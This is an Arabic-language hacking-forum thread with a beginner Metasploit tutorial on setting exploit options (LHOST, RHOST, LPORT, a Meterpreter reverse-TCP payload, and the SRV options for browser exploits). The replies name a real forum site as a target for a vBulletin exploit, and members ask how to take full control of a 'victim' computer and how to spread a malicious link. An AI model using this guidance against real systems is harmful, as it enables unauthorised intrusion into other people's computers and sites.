:: vBspiders Professional Network :: - [الدرس الثالث]ادخال معلومات الهدف الى خيارات الثغرة(مهم)

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- MetaSploit (http://www.vbspiders.com/vb/f196.html)

[الدرس الثالث]ادخال معلومات الهدف الى خيارات الثغرة(مهم)

بسم الله الرحم الرحيم
السلام عليكم ورحمة الله وبركاتة

اليوم درسنا الدرس الثالث ان شاء الله رح يكون عن ادخال معلومات الهدف في خيارات الثغرة لأستغلالها بالشكل الصحيح
نبدأ على طول على بركة الله .. للعلم هذا الدرس اساسي في اعتمادك على الاختراق وهو يعتمد في عملية الاستهداف على 99% اذا لم يكن 100%
اول امر وهو

كود PHP:

set

تطرقنا له في الدرس الثاني .. لأظهار خيارات الثغرة show options وهذا الامر موضح بالدرس السابق ..وبهذا الامر تستطيع معرفة ماذا ستستعملانظر تحت v_v
نشوف الآن كيف يكون الامر

كود PHP:

   set LHOST 192.168.1.151

يستخدم لادخال اي بي جهازنا ضمن خيارات الثغرة لتصنت عن طريقة او وصول تبليغ

كود PHP:

   set RHOST 192.168.5.110

يستخدم هذا ايضا لادخال اي بي جهاز الضحية يعني باختصار ي بي الهدف

كود PHP:

   set LPORT 4444

ادخال البورت الذي ستستخدمه في التصنت ولك الحق بوضع اي رقم بورت تريده وهذا يستخجم في حال انت تستخدم بايلود اتصال عكسي او ثغرة اتصال عكسي reverse

كود PHP:

   set RPORT 192.168.5.151

لأدخال بورت الهدف بتاع الضحية الى خيارات الثغرة ويستخدم هذا في حال الاتصال المباشر bind
###

كود PHP:

   set PAYLOAD windows/meterpreter/reverse_tcp

يستخدم لتحديد البايلود الذي نريد استخدامه في عملية الاختراق وان شاء الله رح يكون درس كامل عن هذه البايلود لخطورتها وسهولة استعمالها وقوتها

كود PHP:

   set PATH /vb/

هنا لتحديد المسار انا وضعت vb لمثال وانما في بعض تطلب مسارات اخرى لكن اللي يهمني هو الدال عليه وهو PATH وهو المسار المراد استخدام بشكل عام بأي ثغرة سواء كان تحديد مسار سكربت او تحديد ملف لأستعماله في الاختراق سواء سيرفر او غيره

كود PHP:

   set VHOST host.com

هنا لتحديد رابط الاستضافة في حال كنا نستهدف موقع نادرا ما تلاقي هذا الخيار

كود PHP:

   set SRVPORT 80

يستخدم لأدخال البورت في حال استخدام احد ثغرات المتصفح .. وهذا الخيار لا ياتي الا في ثغرات المتصفح browser هذا على حسب استعمالي اني لم اجدها في اي ثغرات اخرى غير ثغرات المتصفح وفي هذه الحالة فيك تضع 80 او 8080 او اي بورت غيره
ويلزم يكون البورت الذي تريد وضعه يكون مفتوح عندك ويفضل وضع 80 لانه للمتصف http وانت الان تتصفح انظر فوق اول رابط الموقع مكتوب http وهو بورت 80 اذا اكيد يكون مفتوح تلقائي يعني ما بتشوفه مفتوح بالرواتر هذا على حسب استنباطي

كود PHP:

   set SRVHOST 0.0.0.0

يسخدم ايضا هذا الخيار فقط تلقاه في ثغرات المتصفح هذا تضع به الاي بي جهازك.. واذا تركته مثل ما هو SRVHOST 0.0.0.0 رح يتم الاستغلال تلقائي يعني وضع اي بي جهازك تلقائي فيفضل ان لا تعدل عليه لانه رح يتم تلقائي وضع اي بي جهازك يعني رح تشوفه في خيارات الثغرة هكذا 0.0.0.0

كود PHP:

   set URIPATH arhacker.html

يستخدم هذا الامر لوضع رابط وايضا هذا يستخدم في ثغرات المتصفح يعني يمكن ما تلاقيه بثغرات اخرى << لست متذكر اني لم اجده في ثغرات اخرى

الى هنا ينتهي الدرس بحمد الله
اي استفسار ضعه هنا وان شاء الله يتم الرد واذا لم اكن موجود فألاعضاء ما يقصرون معك بأذن الله
ان شاء الله الدرس الرابع رح اتطرق لانواع البايلود واهميتها ووظيفتها
####
تحياتي
لا للاحتكار
المجهوول

حياك الله يالمجهول بارك الله بيك
نور الله دربك

الله ينورك بأنوار النبي الخير اخي

موفق بمسيرتك وان شاء الله نتعلم انا على ييدك خخ :D
##
تحياتي
لا للاحتكار
المجهوول

مشكوووووور واصل تألقك
انتظر كامل الدورة

السلام عليكم بارك الله فيك اخي

مشكور يا قلبي على الشرح الرائع والمتميز

واصل ابداعك

درس قيم الله يعطيك العافيه

بارك الله فيك اخي

مشكووووور يا بطل

شرح وااافي و كاااافي و رااائع

اقتباس:

كود PHP:
set VHOST host.com

هنا لتحديد رابط الاستضافة في حال كنا نستهدف موقع نادرا ما تلاقي هذا الخيار

رووعه

عندي عندي استفسار في مخي مو قادر اخفيه

ليه ادخل رابط موقع الاستضافه
شو فايدته <<<<<سؤال تافه -_- << بررررررررررررى

عندك موقع www.israelforum.com

الثغره unix/webapp/php_vbulletin_template
السكربت او البرنامج
vBulletin misc.php Template Name Arbitrary Code
يعني الابتسامات

شوف الـ show options

تابع ...

Name Current Setting Required Description
---- --------------- -------- -----------
PATH || /forum/misc.php || yes || Path to misc.php
Proxies || || no || Use a proxy chain
RHOST|| || yes || The target address
RPORT|| 80 || yes || The target port
SSL|| false || || no || Use SSL
VHOST|| || no || HTTP server virtual host

تابع ...

هي مو مهمه كما في الفقره Required

on

بس اذا كتبت شو بيصير ^^

سؤال غبي صح

بس مدري يعني اذا كتبت الاستضافه اش اللي راح يحصل في الموقع

اذا شايف انه ما له داعي اوك لا تجاوب

و شكرا لعى الدرس ^^

V host واضحة تعني رابط الاستضافة وتسال ليش هذا يرجع للمصمم الميتا
من ناحيتي رابط الاستضافة لكي تأخذ معلومات حول البورتات وهل مفتوحة لتفذ الغرة وعمل test قبل التجربة
هذا والله اعلم

اقتباس:

شكرا لك على التوضيح

بارك الله فيك يامجهول وياليت اللع يعطيك العافيه تشرحلنا بصووره تعرف مبتدا بالميتا ولك الف شكر

ما اظن يوجد تبسيط اكثر من ذلك
لكن النقطة اللي مش فاهمها قول لي اياها
ولا تنسى تتابع الدروس من اول درس
تحياتي
لا للاحتكار

جزاك الله خيرا مجهود عظيم
سبحان الله وبحمدة سبحان الله العظيم

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

شكرا اخي لكن عندي استفسار في تغرة المتصفح يعني يعطيك اسم رابط مثل هدا رابط hhtp:\\298.12.12.122\google
لما جربتو على اكسبلور طلعت عند نفسي انا ضحية يعني كيف ننشر هدا رابط بعد ما تعملو بميتا
شكرا لك على شرح

بارك الله فيك يامجهول

when i put this and all my victim informations how can i start full access to his computer ?????????

جزاك الله خير على تواصلك ---

بارك الله فيك اخي

تسلم ياروحي شروحك جدا قويه ياقلبي وجاري المتآبعه ولكن عندي الكثير من الاستفسآرآت اين اجدك ؟!

وآنآ رفعت الميتآسبلويت على سيرفر وفتحت بورت في السيرفر لاجل التنصت ولكن لم استطع الاخترآق هل تسآعدني :$ ..

واسف الموضوع ليس { مكآنه } :$ تسلم على مجهودك .

مشكوووووور يا مبدع

مشكور يالغالي وما قصرت عزالله شرح وافي وكافي
يا حبذا لو ترفق صور لمواضيعك ع شان العموم يستفيد
تح ـــياتي وتقديري لك,,